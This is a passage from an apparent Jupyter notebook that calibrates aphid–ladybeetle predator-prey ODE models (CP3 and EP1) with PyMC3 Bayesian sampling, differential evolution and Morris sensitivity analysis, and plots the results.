# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP3_model",
CP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP3_model",
CP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP3_model",
CP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_CP3:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_CP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[110]:
plt.hist(trace_calibration_CP3['a1'], bins=35)
plt.show()
# In[111]:
calibration_variable_names = [
"std_deviation",
"a1",
"a3",
]
# In[112]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_CP3[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_CP3.png")
# In[113]:
az.plot_pair(
trace_calibration_CP3,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_CP3.png")
# In[114]:
df_stats_summary = az.summary(
data=trace_calibration_CP3,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[115]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[116]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_CP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_CP3.csv") # salvando em um csv para consultas
df_stats_summary
# In[117]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_CP3["CP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_CP3["CP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_CP3["CP3_model"], 50, axis=0)
# In[118]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_CP3.png", dpi=300)
plt.show()
# In[119]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_CP3.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_CP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[120]:
df_realizations
# # Exponential Prey Growth FR1 model
# In[121]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def EP1_model(
t,
X,
r1 = 1,
a1 = 1,
):
u, v = X
u_prime = r1 * u - a1 * u * v
v_prime = 0
return u_prime, v_prime
def EP1_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
a1 = 1,
):
solution_ODE = solve_ivp(
fun=EP1_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,a1),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[122]:
def EP1_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[123]:
from scipy import optimize
seed = 1234
r1=0.0025591841125063588
a1=0.005814656330586127
denom_min = 0.1
denom_max = 1.9
bounds_EP1 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
]
result_EP1 = optimize.differential_evolution(
EP1_least_squares_error_ode,
bounds=bounds_EP1,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
EP1_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_EP1)
# * Retrieving the calibrated parameter values:
# In[124]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
) = result_EP1.x
solution_ODE_EP1 = EP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_EP1.x
)
t_computed_EP1, y_computed_EP1 = solution_ODE_EP1.t, solution_ODE_EP1.y
u_EP1, v_EP1 = y_computed_EP1
parameters_dict = {
"Model": "EP1",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[125]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_EP1, u_EP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_EP1, v_EP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[126]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[127]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = EP1_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
EP1_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[128]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[129]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_EP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[130]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[131]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP1 = EP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP1.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[132]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[133]:
df_sigmai
# In[134]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_EP1.png", dpi=300)
plt.show()
# In[135]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_EP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[136]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[137]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_EP1,
u_EP1,
v_EP1,
EP1_model,
mean_values_params
)
pest_time_derivative_array
# In[138]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_EP1, u_EP1, '-x', label='Pest population')
plt.plot(t_computed_EP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_EP1.png", dpi=300)
plt.show()
# In[139]:
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[140]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP1 = EP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP1.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
EP1_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[141]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[142]:
df_sigmai
# In[143]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_EP1.png", dpi=300)
plt.show()
# In[144]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_EP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[145]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # a1
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def EP1_ode_wrapper(time_exp, r1, a1, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, a1]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
EP1_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[146]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_EP1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP1_model",
EP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP1_model",
EP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP1_model",
EP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_EP1:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_EP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[147]:
plt.hist(trace_calibration_EP1['a1'], bins=35)
plt.show()
# In[148]:
calibration_variable_names = [
"std_deviation",
"a1",
]
# In[149]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_EP1[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_EP1.png")
# In[150]:
az.plot_pair(
trace_calibration_EP1,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_EP1.png")
# In[151]:
df_stats_summary = az.summary(
data=trace_calibration_EP1,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[152]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
